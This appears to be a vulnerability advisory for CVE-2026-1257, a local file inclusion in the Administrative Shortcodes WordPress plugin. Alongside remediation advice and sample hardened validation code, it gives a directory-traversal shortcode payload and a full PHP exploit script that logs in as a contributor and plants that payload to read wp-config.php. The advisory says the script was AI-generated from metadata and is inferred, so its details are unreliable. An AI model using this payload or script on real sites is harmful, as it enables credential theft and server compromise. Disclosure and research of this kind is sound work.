Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1257: Administrative Shortcodes <= 0.3.4 – Authenticated (Contributor+) Local File Inclusion via 'slug' Shortcode Attribute (administrative-shortcodes)

CVE ID: CVE-2026-1257
Severity: High (CVSS 7.5)
CWE: CWE-98
Vulnerable Version: 0.3.4
Patched Version:
Disclosed: January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1257 (metadata-based):
This vulnerability is an authenticated Local File Inclusion (LFI) in the Administrative Shortcodes WordPress plugin. Attackers with Contributor-level access or higher can exploit the ‘slug’ attribute of the ‘get_template’ shortcode to include arbitrary server files. The flaw permits PHP code execution when included files contain executable code, leading to complete server compromise.

Atomic Edge research identifies the root cause as improper path validation in the plugin’s shortcode handler. The plugin passes user-controlled input from the ‘slug’ attribute directly to the WordPress get_template_part() function without sanitization. This matches the CWE-98 classification for improper filename control in PHP include/require statements. The analysis infers the vulnerable code pattern from the CWE classification and vulnerability description, as no source code diff is available for confirmation.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker crafts a post or page containing the malicious shortcode. A payload like [get_template slug="../../../wp-config.php"] would attempt to include the WordPress configuration file. Attackers can traverse directories using path traversal sequences. They may upload seemingly benign files (like images) containing PHP code via WordPress media uploads, then include those files to achieve remote code execution.

Effective remediation requires implementing strict path validation before file inclusion. The plugin should restrict the ‘slug’ parameter to safe values within expected template directories. WordPress security best practices recommend using the sanitize_file_name() function and validating paths against an allowlist. The plugin should also verify file extensions and reject directory traversal attempts.
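The allowlist validation the remediation paragraph describes, shown as an added example that is neither the plugin's code nor the advisory's. The shortcode name and the 'slug' attribute come from the advisory; the function names, the templates/ sub-directory and the allowlist entries are assumptions, and the vulnerable pattern in the comment is the one the advisory infers, not confirmed source.

```php
<?php
// Added example: hardened [get_template slug=...] handler. Names, the
// 'templates/' sub-directory and the allowlist below are assumptions.

// Template parts the plugin is meant to expose (hypothetical values).
const ADMIN_SC_ALLOWED_SLUGS = ['header', 'footer', 'sidebar'];

/**
 * Return the slug if it is safe, otherwise null. Rejects traversal,
 * separators, dots, NUL bytes and anything not on the allowlist, so
 * only known template parts can ever reach get_template_part().
 */
function admin_sc_validate_slug($slug): ?string {
    if (!is_string($slug)) {
        return null;
    }
    // Lowercase letters, digits and hyphens only. \z (not $) so a
    // trailing newline cannot slip past the check.
    if (!preg_match('/^[a-z0-9-]{1,64}\z/', $slug)) {
        return null;
    }
    return in_array($slug, ADMIN_SC_ALLOWED_SLUGS, true) ? $slug : null;
}

// Pattern the advisory infers for the vulnerable handler (do not use):
//   function vuln_get_template($atts) {
//       get_template_part('templates/' . $atts['slug']); // unsanitized
//   }

// Hardened handler: validate first, fail closed, never echo raw input.
function admin_sc_get_template_shortcode($atts) {
    $atts = is_array($atts) ? $atts : [];
    $slug = admin_sc_validate_slug($atts['slug'] ?? '');
    if ($slug === null) {
        return ''; // unknown or malformed slug renders nothing
    }
    ob_start();
    get_template_part('templates/' . $slug);
    return ob_get_clean();
}

if (function_exists('add_shortcode')) {
    add_shortcode('get_template', 'admin_sc_get_template_shortcode');
} else {
    // Stand-alone check of the validator when run outside WordPress.
    $samples = ['header', '../../../wp-config.php', 'header.php', '', 'HEADER'];
    foreach ($samples as $in) {
        printf("%-28s => %s\n", var_export($in, true),
               var_export(admin_sc_validate_slug($in), true));
    }
}
```

Only 'header' survives the check in the stand-alone run; every traversal, extension, empty or mixed-case input is rejected before any file lookup happens.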

Successful exploitation grants attackers arbitrary PHP code execution on the server. This leads to complete site compromise, sensitive data exposure (database credentials in wp-config.php), and privilege escalation to administrator. Attackers can establish persistent backdoors, deface websites, or pivot to other systems on the network. The CVSS score of 7.5 reflects high impact across confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1257 - Administrative Shortcodes <= 0.3.4 - Authenticated (Contributor+) Local File Inclusion via 'slug' Shortcode Attribute
/**
 * Proof of Concept for CVE-2026-1257
 * Assumptions based on vulnerability metadata:
 * 1. The plugin registers a 'get_template' shortcode
 * 2. The shortcode accepts a 'slug' attribute
 * 3. The attribute value is passed unsanitized to get_template_part()
 * 4. Contributor+ authentication is required
 * 5. Exploitation occurs via WordPress post/page content
 */

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Initialize cURL session for WordPress authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login nonce (WordPress security token)
$response = curl_exec($ch);
preg_match('/name="log"[^>]+value="([^"]*)"/', $response, $log_nonce);
preg_match('/name="pwd"[^>]+value="([^"]*)"/', $response, $pwd_nonce);

// Perform authentication
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$response = curl_exec($ch);

// Verify authentication success
if (strpos($response, 'Dashboard') === false) {
    die('Authentication failed. Check credentials.');
}

// Create a post with malicious shortcode
// Attempt to include wp-config.php via directory traversal
$malicious_content = "Test post with malicious shortcode:\n[get_template slug=\"../../../wp-config.php\"]";

// Get nonce for post creation (from admin-ajax or REST API)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce (pattern varies by WordPress version)
preg_match('/_wpnonce" value="([a-f0-9]+)"/', $response, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

// Submit the post (simplified - actual WordPress requires multiple parameters)
$post_data = [
    'post_title' => 'Test LFI Exploit',
    'content' => $malicious_content,
    'post_type' => 'post',
    'post_status' => 'draft',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $target_url . '/wp-admin/post-new.php',
    'publish' => 'Publish'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Check if post was created successfully
if (strpos($response, 'Post published') !== false || strpos($response, 'Post draft updated') !== false) {
    echo "Exploit post created. Visit the post to trigger file inclusion.\n";
    echo "If wp-config.php is included, database credentials will be exposed.\n";
} else {
    echo "Post creation may have failed. Check permissions and nonce.\n";
}

curl_close($ch);
?>
